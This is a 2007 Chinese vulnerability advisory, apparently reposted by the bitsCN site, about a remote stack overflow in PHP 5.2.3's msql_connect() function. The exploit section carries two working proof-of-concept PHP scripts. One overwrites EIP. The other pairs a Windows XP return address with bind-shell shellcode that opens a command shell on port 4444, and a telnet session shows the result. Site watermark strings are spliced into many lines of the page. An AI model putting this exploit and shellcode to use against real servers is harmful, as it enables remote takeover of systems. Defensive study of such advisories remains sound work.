PHP MSQL_Connect函数远程栈溢出漏洞

2007-09-06 作者:bitsCN整理来源:中国网管联盟点评 投稿 收藏

涉及程序：
PHP

描述：
PHP MSQL_Connect函数远程栈溢出漏洞

详细：
PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。

中国网管联盟bitsCN.com

PHP mSQL扩展处理用户提交的超长参数时存在缓冲区溢出漏洞，本地攻击者可能利用此漏洞提升权限。

中国网管联盟bitsCN.com

PHP mSQL扩展的php_msql_do_connect()函数存在栈溢出漏洞，如果能够向msql_connect()或msql_pconnect()函数的第一个参数传送超长字符串的话，就可以触发这个溢出，导致执行任意指令。中国网管联盟bitsCN.com

<*来源：NetJackal （nima_501@yahoo.com）中国网管论坛bbs.bitsCN.com

链接：http://secunia.com/advisories/25735/
*> 网管联盟bitsCN_com

受影响系统：
PHP PHP 5.2.3

攻击方法：
警告网管u家u.bitscn@com

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

网管bitscn_com

<?php 网管下载dl.bitscn.com

if(!function_exists('msql_connect'))
die('mSQL extension is not available');

中国网管联盟bitsCN.com

#msql_pconnect(str_repeat('A',49424).'BBBB');

网管网www_bitscn_com

msql_connect(str_repeat('A',49424).'BBBB'); # EIP => 42424242 网管u家u.bitsCN.com

?> 网管u家u.bitscn@com

<?php
/*
Inphex
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 ,
Windows TinyXP - vm.

网管下载dl.bitscn.com

GET /script.php HTTP/1.1\n

网管下载dl.bitscn.com

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp. 网管论坛bbs_bitsCN_com

C:\apache>
*/
if(!function_exists('msql_connect')) {
die('mSQL extension is not available');
}

网管联盟bitsCN@com

$ret = "\xA3\x3D\x92\x7C"; #shell32.dll ->CALL EBP WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x58\x4a\x4f\x89" .
"\x2f\x95\x91\xc0\xdd\x98\xd3\x3e\x29\xa1\x87\xe4\xfa\xa0" .
"\xc2\x6e\xa5\x6e\x0c\x9a\x3c\xe5\x02\x17\x4a\xa6\x06\xa6" .
"\xa7\x5b\x1b\x23\xbe\x37\x47\x2f\xa0\x04\xb6\x94\x46\x01" .
"\xfa\x1a\x0c\x55\xf1\xd1\x62\x49\xa4\x6d\xc2\x79\xe8\x19" .
"\x4d\x37\x1a\x36\x01\x38\xf4\xa0\xf1\xa0\x91\x1f\xc4\x44" .
"\x15\x13\x1a\xcb\x8d\x2c\x8a\x9b\xe6\x3e\xd7\x60\xa9\x3f" .
"\xfe\xc9\xc0\x25\x99\x74\x3f\xad\x64\x23\xaa\xac\x97\x1b" .

网管联盟bitsCN_com

"\x42\x68\x6e\x6e\x3e\xdd\x8e\x46\x12\xb1\x23\x35\xc6\x76" .
"\x97\xfa\xbb\x87\xc7\x9a\x53\x69\xb4\x04\xf7\x00\xa5\x5d" .
"\x9f\xb6\x3c\x2d\xa7\xe0\xbf\x1b\x4d\x1f\x11\xf6\x6d\xcf" .
"\xf9\x5c\x3c\xde\x10\xcb\xc0\xc9\xb0\xa6\xc1\x26\x5e\xad" .
"\x77\x41\xd6\x7a\x77\x9b\xb9\xd0\xd3\x71\xc5\x08\x48\x11" .
"\xde\xd1\xa9\x9b\x77\xde\xe0\x09\x87\xf0\x6b\xd8\x13\x96" .
"\x1b\x7f\xb1\xdf\x39\x15\x19\x86\xe8\x26\x10\xdf\x81\xf2" .
"\xaa\xfd\x67\x3b\x5f\xab\x76\xf9\x8d\x55\xc4\xd2\x5e\x24" .
"\xb3\x12\xca\x9d\xef\x0b\x7e\x1f\x5c\xdd\x81\xaa\xe7\x1d" .
"\xab\x0f\xbf\xb3\x05\xfe\x6e\x5e\xa7\x51\xc0\xcb\xf6\xae" .
"\x32\x9b\x55\x89\xb6\x92\xf5\xd6\x6f\x40\x05\xd7\xa7\x6a" .
"\x29\xac\x9f\x68\x49\x76\x7b\x6e\x98\x24\x7b\x40\x4d\x38" .
"\x09\x65\xd1\xeb\xf1\xb0\x12\xdb\x0e\x3d\xed";
//
msql_connect(str_repeat('A',49422)."\xeb\x02".$ret."\x15B".$shellcode."");

中国网管论坛bbs.bitsCN.com

?>

解决方案：
厂商补丁：

网管联盟bitsCN@com

PHP
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：网管论坛bbs_bitsCN_com

http://www.php.net

网管u家u.bitscn@com

顶一下

TAGs：溢出漏洞远程函数 " PHP x6e msql_connect

上一篇：Xfce-Terminal远程命令注入漏洞下一篇：Microsoft DirectX Media SDK DXTLIPI.DLL控件远程栈溢出漏洞

PHP MSQL_Connect函数远程栈溢出漏洞

2007-09-06 作者:bitsCN整理 来源:中国网管联盟 点评 投稿 收藏

2007-09-06 作者:bitsCN整理来源:中国网管联盟点评投稿收藏